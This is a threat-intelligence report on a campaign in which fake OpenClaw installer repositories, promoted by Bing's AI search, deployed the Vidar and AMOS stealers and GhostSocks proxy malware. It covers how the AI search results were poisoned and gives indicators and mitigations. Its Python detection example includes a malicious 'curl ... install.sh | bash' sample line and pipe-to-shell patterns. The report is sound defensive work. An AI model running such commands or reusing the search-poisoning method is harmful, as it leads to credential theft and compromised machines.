Full Report
Fake OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing's AI-enhanced search feature instructed users to run commands that deployed information stealers and proxy malware. [...]
Analysis Summary
# Tool/Technique: Bing AI-Poisoned OpenClaw Installer Campaign
## Overview
This attack campaign leverages **Search Engine Poisoning** specifically targeting AI-enhanced search features (Bing AI). Threat actors created a fake GitHub organization and repositories posing as installers for "OpenClaw," a popular open-source AI agent. By appearing legitimate, these repositories were promoted by Bing AI to users, leading them to execute commands or download files that deployed a variety of information stealers and proxy malware.
## Technical Details
- **Type:** Malware Campaign / Social Engineering / Search Result Poisoning
- **Platform:** Windows, macOS
- **Capabilities:** Credential theft, session hijacking, C2 communication via legitimate platforms (Telegram/Steam), and turning host machines into backconnect proxies.
- **First Seen:** February 2026 (Reported March 2026)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
    - **[T1189 - Drive-by Compromise]**: Users are led to malicious sites/repos via search results.
    - **[T1566.003 - Phishing: Spearphishing Service]**: Leveraging trusted platforms like GitHub to host malicious code.
- **[TA0002 - Execution]**
    - **[T1059.004 - Command and Scripting Interpreter: Unix Shell]**: Instructing macOS users to run malicious bash commands.
- **[TA0005 - Defense Evasion]**
    - **[T1027 - Obfuscated Files or Information]**: Using Rust-based loaders to execute payloads in memory.
    - **[T1564.009 - Hide Artifacts: Resource Forking]**: Associating Mach-O executables with shell scripts on macOS.
- **[TA0011 - Command and Control]**
    - **[T1102.002 - Web Service: Bidirectional Communication]**: Using Telegram and Steam profiles to retrieve C2 configuration.
- **[TA0009 - Collection]**
    - **[T1539 - Steal Web Session Cookie]**: Information stealing capabilities.
    - **[T1555 - Credentials from Password Stores]**: Harvesting browser-stored credentials.
## Functionality
### Core Capabilities
- **Information Stealing:** Harvesting passwords, cookies, and sensitive data from browsers and local files.
- **Backconnect Proxy:** Converting the infected host into a node for the **GhostSocks** network to route malicious traffic.
- **Multi-Platform Targeting:** Specifically designed distribution chains for both Windows (x64 executables) and macOS (shell scripts/Mach-O).
### Advanced Features
- **AI Search Poisoning:** The threat actor successfully manipulated Bing AI’s recommendation engine by creating high-affinity GitHub Organizations (`openclaw-installer`) and cloning legitimate code from unrelated projects (e.g., Cloudflare moltworker) to simulate authenticity.
- **Memory-Only Execution:** Use of Rust-based loaders to inject Vidar stealer directly into memory, minimizing the on-disk footprint.
- **Dead Drop Resolvers:** Leveraging the bios/profiles of Steam and Telegram users to host C2 addresses, making the traffic appear legitimate.
## Indicators of Compromise
### File Names
- `OpenClaw_x64.exe` (Windows)
- `dmg` (macOS Repository name)
### Network Indicators
- `github[.]com/openclaw-installer` (Malicious Organization)
- `github[.]com/puppeteerrr/dmg` (Malicious Repository)
- `telegram[.]org` (C2 resolution)
- `steamcommunity[.]com` (C2 resolution)
### Behavioral Indicators
- PowerShell or Bash execution initiated directly from web-based installation instructions.
- Unrecognized Mach-O executables running on macOS following a terminal command.
- Persistent outbound connections to proxy-related ports (associated with GhostSocks).
## Associated Threat Actors
- **Unknown** (The campaign shows high technical proficiency in SEO/AI-poisoning and the use of the **Vidar** and **GhostSocks** malware families).
## Detection Methods
- **Signature-based:** Detect known Vidar variants and GhostSocks binaries.
- **Behavioral:**
    - Monitoring for `curl` or `wget` commands fetching scripts from GitHub that are piped immediately into `bash` or `sh`.
    - Detecting unusual Rust-compiled binaries performing process injection.
    - Monitoring for system processes (like `svchost.exe`) communicating with Telegram or Steam APIs in high-security environments.
- **YARA:** Target the unique shell script wrappers used in the macOS "dmg" repository.
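The first and third behavioral checks above, run over a few constructed telemetry lines, as an added example that is not part of the report. The log format (`timestamp|host|event|process|detail`), the host names and the release URL are assumptions; the dead-drop hosts and the `openclaw-installer` organization are the ones the report names.

```python
import re

# Constructed sample telemetry (not from the report): one event per line,
# fields are timestamp|host|event|process|detail.
SAMPLE_EVENTS = [
    "2026-02-14T10:01:02Z|mac-01|proc_create|zsh|curl -fsSL https://raw.githubusercontent.com/openclaw-installer/dmg/main/install.sh | bash",
    "2026-02-14T10:01:05Z|mac-01|proc_create|zsh|curl -fsSL https://example.invalid/readme.txt -o readme.txt",
    "2026-02-14T10:03:11Z|win-07|net_conn|svchost.exe|steamcommunity.com:443",
    "2026-02-14T10:03:12Z|win-07|net_conn|chrome.exe|steamcommunity.com:443",
    "2026-02-14T10:04:00Z|win-07|proc_create|powershell.exe|wget https://github.com/openclaw-installer/dmg/releases/OpenClaw_x64.exe -OutFile OpenClaw_x64.exe",
]

# curl/wget fetching from GitHub with the output piped straight into a shell.
# A plain download (no pipe) is not flagged by this rule.
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|]*?(github\.com|raw\.githubusercontent\.com)[^|]*\|\s*(sudo\s+)?(bash|sh|zsh)\b",
    re.IGNORECASE,
)
# Dead-drop resolver hosts named in the report; match the host or any subdomain.
DEAD_DROP_HOSTS = ("telegram.org", "steamcommunity.com")
# Processes that have no business talking to those hosts; extend for your estate.
SYSTEM_PROCS = {"svchost.exe"}


def is_dead_drop(dest):
    host = dest.rsplit(":", 1)[0].lower()
    return any(host == h or host.endswith("." + h) for h in DEAD_DROP_HOSTS)


def scan(events):
    """Return (timestamp, host, rule, evidence) tuples for matching events."""
    alerts = []
    for line in events:
        ts, host, event, proc, detail = line.split("|", 4)
        if event == "proc_create" and PIPE_TO_SHELL.search(detail):
            alerts.append((ts, host, "github_script_piped_to_shell", detail))
        elif event == "net_conn" and proc.lower() in SYSTEM_PROCS and is_dead_drop(detail):
            alerts.append((ts, host, "system_process_dead_drop_contact", f"{proc} -> {detail}"))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```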
## Mitigation Strategies
- **User Education:** Advise users to download software only from official, verified domains they have bookmarked (e.g., the official OpenClaw GitHub).
- **Execution Policy:** Implement strict execution policies (e.g., AppLocker or macOS Gatekeeper) to prevent unsigned or unauthorized binaries from running.
- **Network Filtering:** Block or monitor traffic to Dead Drop Resolver sites (Telegram/Steam) if they are not required for business operations.
- **Organization Validation:** Train developers and IT staff to check the creation date and contribution history of GitHub organizations before trusting "installer" repos.
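The organization-validation check above, turned into a scored review of repository metadata, as an added example that is not part of the report. The metadata is constructed to resemble GitHub REST API fields (`created_at`, `fork`) but is not live API output, and the flat commit records (author login plus author date) are a simplification of the real commit objects; the thresholds are assumptions to tune.

```python
from datetime import datetime, timedelta, timezone

# Constructed metadata (not real API output), shaped after GET /orgs/{org},
# GET /repos/{owner}/{repo} and a flattened view of GET .../commits.
ORG = {"login": "example-installer-org", "created_at": "2026-02-10T08:00:00Z"}
REPO = {"name": "installer", "created_at": "2026-02-11T09:00:00Z", "fork": False}
COMMITS = [  # author login and author date per commit
    {"author": "upstream-dev", "date": "2024-05-03T12:00:00Z"},
    {"author": "upstream-dev", "date": "2024-06-10T12:00:00Z"},
    {"author": "installer-bot", "date": "2026-02-11T10:00:00Z"},
]
NOW = datetime(2026, 3, 1, tzinfo=timezone.utc)


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def trust_flags(org, repo, commits, now, min_age_days=90, min_authors=3):
    """Return the reasons an 'installer' repo should not be trusted yet."""
    flags = []
    if now - parse_ts(org["created_at"]) < timedelta(days=min_age_days):
        flags.append("org_created_recently")
    if len({c["author"] for c in commits}) < min_authors:
        flags.append("few_distinct_contributors")
    repo_created = parse_ts(repo["created_at"])
    imported = [c for c in commits if parse_ts(c["date"]) < repo_created]
    # Commits dated before the repository existed mean the history was pushed
    # in from elsewhere; in a non-fork that is consistent with code cloned from
    # an unrelated project to simulate a mature codebase.
    if imported and not repo["fork"]:
        flags.append("history_predates_repo_not_a_fork")
    return flags


if __name__ == "__main__":
    print(trust_flags(ORG, REPO, COMMITS, NOW))
```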
## Related Tools/Techniques
- **Atomic Stealer (AMOS):** The primary payload identified for macOS targets.
- **Vidar Stealer:** The primary payload identified for Windows targets.
- **GhostSocks:** The proxy malware used for network relay.
- **SEO Poisoning:** The traditional precursor to this AI-enhanced search poisoning technique.